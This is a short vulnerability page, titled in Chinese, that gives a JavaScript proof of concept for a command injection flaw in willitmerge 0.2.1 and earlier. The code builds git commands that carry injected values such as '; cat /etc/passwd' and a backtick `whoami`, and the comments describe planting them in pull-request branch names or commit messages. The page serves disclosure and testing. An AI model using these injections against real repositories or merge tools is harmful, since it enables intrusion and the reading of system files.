CVE-2025-66219 willitmerge命令注入漏洞（严重）

// CVE-2025-66219 PoC - Command Injection in willitmerge // Affected versions: willitmerge <= 0.2.1 const { exec } = require('child_process'); // Malicious input that exploits the command injection // Using semicolon to chain commands const maliciousInput = '; cat /etc/passwd'; // This simulates how the vulnerable code concatenates user input const vulnerableCommand = `git status ${maliciousInput}`; console.log('Executing vulnerable command:'); console.log(vulnerableCommand); // The vulnerable code pattern (simplified) // exec(vulnerableCommand, (error, stdout, stderr) => { // console.log(stdout); // }); // Alternative PoC using backticks for command substitution const maliciousInput2 = '`whoami`'; const vulnerableCommand2 = `git log ${maliciousInput2}`; console.log('\nAlternative PoC:'); console.log(vulnerableCommand2); // Real-world attack vector via PR/commit message // Attacker creates a PR with malicious branch name or commit message // When willitmerge processes this PR, the malicious input gets executed